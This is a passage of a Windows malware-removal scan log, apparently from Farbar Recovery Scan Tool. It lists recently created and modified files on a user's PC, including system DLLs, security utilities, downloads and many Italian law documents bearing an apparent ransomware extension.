2015-05-10 09:33 - 2015-05-10 09:33 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\relog.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00040448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\typeperf.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00037888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\relog.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\UtcResources.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00029184 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00019456 _____ (Microsoft Corporation) C:\Windows\system32\diskperf.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\diskperf.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2015-05-10 09:33 - 2015-05-10 09:33 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2015-05-10 09:33 - 2015-05-10 09:33 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2015-05-08 16:06 - 2015-06-01 19:32 - 00000000 ____D () C:\Users\Giovanni\Downloads\Le fate ignoranti
2015-05-08 16:05 - 2015-06-01 19:30 - 00000000 ____D () C:\Users\Giovanni\Downloads\Million Dollar Baby (2004)
2015-05-08 16:04 - 2015-05-08 17:56 - 405450745 ____R () C:\Users\Giovanni\Downloads\Memento - [1080p, x264, ac3 ita, aac eng, subs].mkv
2015-05-06 21:24 - 2015-06-01 19:59 - 00136408 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-05-06 21:24 - 2015-06-01 19:28 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-05-06 21:24 - 2015-05-06 21:24 - 00001102 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-05-06 21:24 - 2015-05-06 21:24 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-05-06 21:24 - 2015-05-06 21:24 - 00000000 ____D () C:\ProgramData\Malwarebytes
2015-05-06 21:24 - 2015-04-14 09:37 - 00107736 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-05-06 21:24 - 2015-04-14 09:37 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-05-06 21:24 - 2015-04-14 09:37 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2015-05-06 21:23 - 2015-05-06 21:24 - 21546080 _____ (Malwarebytes Corporation ) C:\Users\Giovanni\Downloads\mbam-setup-2.1.6.1022.exe
2015-05-06 20:24 - 2015-05-27 07:58 - 00002181 _____ () C:\Users\Public\Desktop\Advanced SystemCare 8.lnk
2015-05-06 20:24 - 2015-01-10 15:32 - 00128288 _____ (IObit) C:\Windows\system32\IObitSmartDefragExtension.dll
2015-05-06 20:24 - 2014-06-04 15:17 - 00034080 _____ (IObit) C:\Windows\system32\SmartDefragBootTime.exe
2015-05-06 20:23 - 2015-05-06 20:23 - 00026528 _____ (REALiX™) C:\Windows\SysWOW64\Drivers\HWiNFO64A.SYS
2015-05-06 19:05 - 2015-05-06 19:05 - 00003166 _____ () C:\Windows\System32\Tasks\Game_Booster_AutoUpdate
2015-05-06 19:01 - 2015-05-06 19:01 - 00000000 _____ () C:\autoexec.bat
2015-05-06 18:59 - 2015-05-06 18:59 - 03044736 _____ (Enigma Software Group USA, LLC.) C:\Users\Giovanni\Downloads\SpyHunter-installer.exe
2015-05-06 10:51 - 2015-05-14 12:48 - 00000020 _____ () C:\Users\Giovanni\AppData\Roaming\appdataFr3.bin
2015-05-06 10:30 - 2015-05-06 22:02 - 00000000 ____D () C:\Program Files (x86)\LibraryModule
2015-05-03 17:06 - 2015-05-03 17:06 - 00000000 ____D () C:\ProgramData\Steam
2015-05-03 17:02 - 2015-05-03 17:02 - 00002211 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\WinZip.lnk
2015-05-03 17:02 - 2015-05-03 17:02 - 00002205 _____ () C:\Users\Public\Desktop\WinZip.lnk
2015-05-03 17:02 - 2015-05-03 17:02 - 00000000 ____D () C:\Users\Giovanni\AppData\Local\WinZip
2015-05-03 17:02 - 2015-05-03 17:02 - 00000000 ____D () C:\ProgramData\WinZip
2015-05-03 17:02 - 2015-05-03 17:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip
2015-05-03 17:01 - 2015-06-01 19:27 - 00000000 ____D () C:\Program Files\WinZip
2015-05-03 16:59 - 2015-05-03 17:00 - 120105328 _____ () C:\Users\Giovanni\Downloads\winzip190.exe
2015-05-03 16:46 - 2015-06-01 19:44 - 00000000 ____D () C:\Users\Giovanni\Downloads\Age of Empire 2 HD ITA PC
2015-05-03 16:46 - 2015-05-03 16:46 - 00018775 _____ () C:\Users\Giovanni\Downloads\Age of Empires 2 HD ITA PC (1).torrent
2015-05-03 16:45 - 2015-05-03 16:46 - 00018775 _____ () C:\Users\Giovanni\Downloads\Age of Empires 2 HD ITA PC.torrent
2015-05-03 16:19 - 2015-06-01 19:29 - 00000000 ____D () C:\Users\Giovanni\AppData\OICE_15_974FA576_32C1D314_9B8
2015-05-03 11:47 - 2015-05-03 11:47 - 00342016 _____ (Microsoft Corporation) C:\Windows\system32\apphelp.dll
2015-05-03 11:47 - 2015-05-03 11:47 - 00295936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apphelp.dll
2015-05-03 11:47 - 2015-05-03 11:47 - 00142336 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe
2015-05-03 11:47 - 2015-05-03 11:47 - 00123904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\poqexec.exe
2015-05-03 11:47 - 2015-05-03 11:47 - 00072192 _____ (Microsoft Corporation) C:\Windows\system32\aelupsvc.dll
2015-05-03 11:47 - 2015-05-03 11:47 - 00023552 _____ (Microsoft Corporation) C:\Windows\system32\sdbinst.exe
2015-05-03 11:47 - 2015-05-03 11:47 - 00020992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sdbinst.exe
2015-05-03 11:47 - 2015-05-03 11:47 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\shimeng.dll
2015-05-03 11:47 - 2015-05-03 11:47 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shimeng.dll
2015-05-03 11:46 - 2015-05-03 11:46 - 02543104 _____ (Microsoft Corporation) C:\Windows\system32\wpdshext.dll
2015-05-03 11:46 - 2015-05-03 11:46 - 02311168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wpdshext.dll
2015-05-03 11:46 - 2015-05-03 11:46 - 01632768 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll
2015-05-03 11:46 - 2015-05-03 11:46 - 01372160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmcore.dll
2015-05-03 11:46 - 2015-05-03 11:46 - 00082944 _____ (Microsoft Corporation) C:\Windows\system32\dwmapi.dll
2015-05-03 11:46 - 2015-05-03 11:46 - 00067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmapi.dll
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-06-01 21:39 - 2014-06-16 07:22 - 00000978 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-06-01 21:16 - 2009-07-14 06:45 - 00023248 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-06-01 21:16 - 2009-07-14 06:45 - 00023248 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-06-01 20:54 - 2009-01-01 02:22 - 00001150 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-06-01 20:44 - 2015-04-19 18:44 - 00000000 ____D () C:\Users\Giovanni\Desktop\Foto
2015-06-01 20:43 - 2009-01-01 02:11 - 00000000 ____D () C:\Users\Giovanni
2015-06-01 20:31 - 2015-05-01 12:04 - 01321888 _____ () C:\Windows\WindowsUpdate.log
2015-06-01 19:48 - 2014-06-27 18:36 - 00000000 ____D () C:\Users\Giovanni\AppData\Local\CrashDumps
2015-06-01 19:42 - 2015-04-19 18:39 - 00000000 ____D () C:\Users\Giovanni\Desktop\Diritto Civile II - Foto libro
2015-06-01 19:32 - 2014-11-16 18:05 - 00000000 ___RD () C:\Users\Giovanni\Dropbox
2015-06-01 19:30 - 2015-04-18 19:54 - 00000000 ____D () C:\Users\Giovanni\Downloads\House.of.Cards.2013.S03E02.WEBRip.x264-2HD[rarbg]
2015-06-01 19:30 - 2014-11-16 18:04 - 00000000 ____D () C:\Users\Giovanni\AppData\Roaming\Dropbox
2015-06-01 19:29 - 2014-09-27 17:34 - 00000000 ____D () C:\Users\Giovanni\AppData\OICE_15_974FA576_32C1D314_1E5
2015-06-01 19:28 - 2015-04-26 10:57 - 00000000 ____D () C:\ProgramData\deoopnakmfchinkaabfjchnemeihjjee
2015-06-01 19:28 - 2014-09-15 22:57 - 00000000 ___RD () C:\Program Files (x86)\Skype
2015-06-01 19:28 - 2014-06-16 07:23 - 00000000 ____D () C:\Program Files (x86)\iTunes
2015-06-01 19:28 - 2009-09-07 02:40 - 00000000 ____D () C:\SwSetup
2015-06-01 19:28 - 2009-01-01 12:08 - 00000000 ____D () C:\ProgramData\Recovery
2015-06-01 19:28 - 2009-01-01 03:51 - 00000000 ____D () C:\Program Files (x86)\Songr
2015-06-01 19:27 - 2010-09-03 16:03 - 00000000 ____D () C:\Program Files (x86)\ATI Technologies
2015-06-01 19:26 - 2014-06-16 08:17 - 00000000 ____D () C:\Dev-Cpp
2015-06-01 19:26 - 2014-06-16 07:23 - 00000000 ____D () C:\Program Files\iPod
2015-06-01 19:17 - 2014-06-15 23:04 - 00000000 ____D () C:\Users\Giovanni\AppData\Roaming\uTorrent
2015-06-01 14:29 - 2014-09-28 12:07 - 00005146 _____ () C:\Windows\System32\Tasks\Microsoft Office 15 Sync Maintenance for Giovanni-HP-Giovanni Giovanni-HP
2015-06-01 09:17 - 2014-06-16 07:29 - 00000052 _____ () C:\Windows\SysWOW64\DOErrors.log
2015-06-01 09:08 - 2014-09-05 10:40 - 00000000 ____D () C:\Users\Giovanni\AppData\Roaming\Spotify
2015-06-01 09:06 - 2014-09-05 10:42 - 00000000 ____D () C:\Users\Giovanni\AppData\Local\Spotify
2015-06-01 09:06 - 2009-01-01 02:22 - 00001146 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-06-01 09:04 - 2009-07-14 07:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-05-30 10:19 - 2014-06-19 17:36 - 00003204 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForGiovanni
2015-05-30 10:19 - 2014-06-19 17:36 - 00000344 _____ () C:\Windows\Tasks\HPCeeScheduleForGiovanni.job
2015-05-30 09:46 - 2014-11-29 10:57 - 00000000 ____D () C:\ProgramData\ProductData
2015-05-27 13:46 - 2010-07-17 15:01 - 00019136 _____ () C:\Users\Giovanni\Documents\Spese 2013.XLSX.xjryulf
2015-05-26 12:50 - 2010-07-17 15:01 - 00187296 _____ () C:\Users\Giovanni\Downloads\Relazione reati fallimentari.DOC.xjryulf
2015-05-26 11:51 - 2015-01-31 18:44 - 00000000 ____D () C:\Users\Giovanni\AppData\Local\Microsoft Games
2015-05-25 09:22 - 2010-07-17 15:01 - 00064672 _____ () C:\Users\Giovanni\Downloads\Diritto Penale.DOCX.xjryulf
2015-05-25 08:26 - 2015-02-20 10:50 - 92696576 _____ () C:\Windows\system32\config\SOFTWARE.iodefrag.bak
2015-05-25 08:26 - 2015-02-20 10:50 - 00319488 _____ () C:\Windows\system32\config\DEFAULT.iodefrag.bak
2015-05-25 08:26 - 2015-02-20 10:50 - 00061440 _____ () C:\Windows\system32\config\SAM.iodefrag.bak
2015-05-25 08:26 - 2015-02-20 10:50 - 00024576 _____ () C:\Windows\system32\config\SECURITY.iodefrag.bak
2015-05-24 11:01 - 2009-01-01 02:40 - 00000000 ____D () C:\Users\Giovanni\AppData\Roaming\DAEMON Tools Lite
2015-05-23 17:29 - 2010-07-17 21:57 - 00741312 _____ () C:\Windows\system32\perfh010.dat
2015-05-23 17:29 - 2010-07-17 21:57 - 00147334 _____ () C:\Windows\system32\perfc010.dat
2015-05-23 17:29 - 2009-07-14 07:13 - 01659852 _____ () C:\Windows\system32\PerfStringBackup.INI
2015-05-22 23:07 - 2015-04-04 16:59 - 00000000 ___SD () C:\Windows\SysWOW64\GWX
2015-05-22 23:07 - 2015-04-04 16:59 - 00000000 ___SD () C:\Windows\system32\GWX
2015-05-22 23:05 - 2009-01-01 03:52 - 00000000 ____D () C:\Users\Giovanni\AppData\Roaming\Skype
2015-05-22 19:07 - 2010-07-17 15:01 - 00011776 _____ () C:\Users\Giovanni\Desktop\Diritto del Lavoro.DOCX.xjryulf
2015-05-22 18:59 - 2010-07-17 15:01 - 00030080 _____ () C:\Users\Giovanni\Downloads\VECCHIO_Dopo_Viking_Laval_e_Ruffert1.DOC.xjryulf
2015-05-21 13:37 - 2010-07-17 15:01 - 00037168 _____ () C:\Users\Giovanni\Downloads\CorteCost2312013.DOCX.xjryulf
2015-05-19 13:10 - 2009-07-14 05:20 - 00000000 ____D () C:\Windows\rescache
2015-05-19 11:19 - 2009-07-14 06:45 - 00450240 _____ () C:\Windows\system32\FNTCACHE.DAT
2015-05-19 11:17 - 2015-03-07 17:36 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
2015-05-19 11:17 - 2015-03-07 17:36 - 00000000 ____D () C:\Program Files (x86)\Microsoft Silverlight
2015-05-19 08:37 - 2014-09-27 14:17 - 00000000 ____D () C:\Program Files\Microsoft Office 15
2015-05-19 08:24 - 2015-03-07 17:36 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2015-05-17 21:47 - 2009-01-01 02:22 - 00004146 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2015-05-17 21:47 - 2009-01-01 02:22 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2015-05-16 12:29 - 2010-07-17 15:01 - 00099408 _____ () C:\Users\Giovanni\Desktop\Sintesi Diritto UE.DOCX.xjryulf
2015-05-12 17:52 - 2010-07-17 15:01 - 00013840 _____ () C:\Users\Giovanni\Downloads\Diritto UE libro vecchio.DOCX.xjryulf
2015-05-11 17:33 - 2010-07-17 15:01 - 00024416 _____ () C:\Users\Giovanni\Downloads\syllabus_e_patto_50102_2014-2015 (1).DOCX.xjryulf
2015-05-11 16:42 - 2010-07-17 15:01 - 00023312 _____ () C:\Users\Giovanni\Downloads\Sez._Un._2008_nuovi_parametri_di_fallibilità.DOC.xjryulf
2015-05-11 16:42 - 2010-07-17 15:01 - 00021808 _____ () C:\Users\Giovanni\Downloads\Tribunale_di_Torino_su_art._236_bis_l._fall.PDF.xjryulf
2015-05-11 12:45 - 2010-07-17 15:01 - 00106256 _____ () C:\Users\Giovanni\Downloads\Slides_Lezione_del_23_aprile_2015 (1).PPTX.xjryulf
2015-05-11 11:42 - 2010-07-17 15:01 - 03537760 _____ () C:\Users\Giovanni\Downloads\cass pen sez un 2014 38343 (1).PDF.xjryulf
2015-05-11 11:42 - 2010-07-17 15:01 - 00574016 _____ () C:\Users\Giovanni\Downloads\Cass._IV_6_dicembre_2013_n._4968 (2).PDF.xjryulf
2015-05-11 11:42 - 2010-07-17 15:01 - 00420704 _____ () C:\Users\Giovanni\Downloads\Cass._IV_10_dicembre_2008_n._4123_-_delega (2).PDF.xjryulf
2015-05-11 07:39 - 2015-02-25 08:23 - 55988224 _____ () C:\Windows\system32\config\components.iodefrag.bak
2015-05-10 16:18 - 2010-07-17 15:01 - 00106256 _____ () C:\Users\Giovanni\Downloads\Slides_Lezione_del_23_aprile_2015.PPTX.xjryulf
2015-05-10 09:27 - 2009-01-01 00:11 - 00000000 ____D () C:\Users\Giovanni\Desktop\Giovanni
2015-05-09 00:22 - 2014-06-16 12:37 - 00000000 ____D () C:\Users\Giovanni\AppData\Roaming\vlc
2015-05-08 07:29 - 2014-11-16 18:05 - 00000000 ____D () C:\Users\Giovanni\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2015-05-07 15:41 - 2014-11-29 10:56 - 00000000 ____D () C:\Program Files (x86)\IObit
2015-05-06 22:11 - 2015-04-21 17:30 - 00000000 ____D () C:\ProgramData\{19cd36e7-34d1-386e-19cd-d36e734ddb9c}
2015-05-06 22:02 - 2014-11-26 12:30 - 00000000 ____D () C:\Windows\pss
2015-05-06 20:24 - 2014-11-29 17:00 - 00003196 _____ () C:\Windows\System32\Tasks\ASC8_PerformanceMonitor
2015-05-06 20:24 - 2014-11-29 16:59 - 00002884 _____ () C:\Windows\System32\Tasks\ASC8_SkipUac_Giovanni
2015-05-06 20:24 - 2014-11-29 16:59 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced SystemCare 8
2015-05-06 20:24 - 2014-11-29 10:56 - 00000000 ____D () C:\Users\Giovanni\AppData\Roaming\IObit
2015-05-06 20:23 - 2014-12-11 14:17 - 00002886 _____ () C:\Windows\System32\Tasks\Driver Booster SkipUAC (Giovanni)
2015-05-06 20:23 - 2014-11-29 10:56 - 00000000 ____D () C:\ProgramData\IObit
2015-05-06 18:59 - 2010-07-17 15:01 - 00000464 _____ () C:\Users\Giovanni\AppData\Local\Temp-log.TXT.xjryulf
2015-05-06 16:53 - 2010-07-17 15:01 - 00024416 _____ () C:\Users\Giovanni\Downloads\syllabus_e_patto_50102_2014-2015.DOCX.xjryulf
2015-05-06 10:31 - 2015-04-28 18:53 - 00000000 ____D () C:\ProgramData\bd5b7d4000076cf
2015-05-03 16:19 - 2010-07-17 15:01 - 00015104 _____ () C:\Users\Giovanni\Downloads\articolo 101 TFUE.DOC.xjryulf
2015-05-03 16:02 - 2015-03-31 15:28 - 00074770 ____H () C:\Users\Giovanni\Desktop\~WRL1452.tmp
2015-05-03 12:09 - 2009-07-14 05:20 - 00000000 ____D () C:\Windows\system32\AdvancedInstallers
2015-05-02 09:49 - 2014-12-01 11:58 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013
 
==================== Files in the root of some directories =======
 
2015-05-06 10:51 - 2015-05-14 12:48 - 0000020 _____ () C:\Users\Giovanni\AppData\Roaming\appdataFr3.bin
2014-11-26 12:32 - 2014-11-27 11:20 - 0007606 _____ () C:\Users\Giovanni\AppData\Local\Resmon.ResmonCfg
2010-07-17 15:01 - 2015-05-06 18:59 - 0000464 _____ () C:\Users\Giovanni\AppData\Local\Temp-log.TXT.xjryulf
2014-09-20 12:02 - 2014-09-20 12:02 - 0000057 _____ () C:\ProgramData\Ament.ini
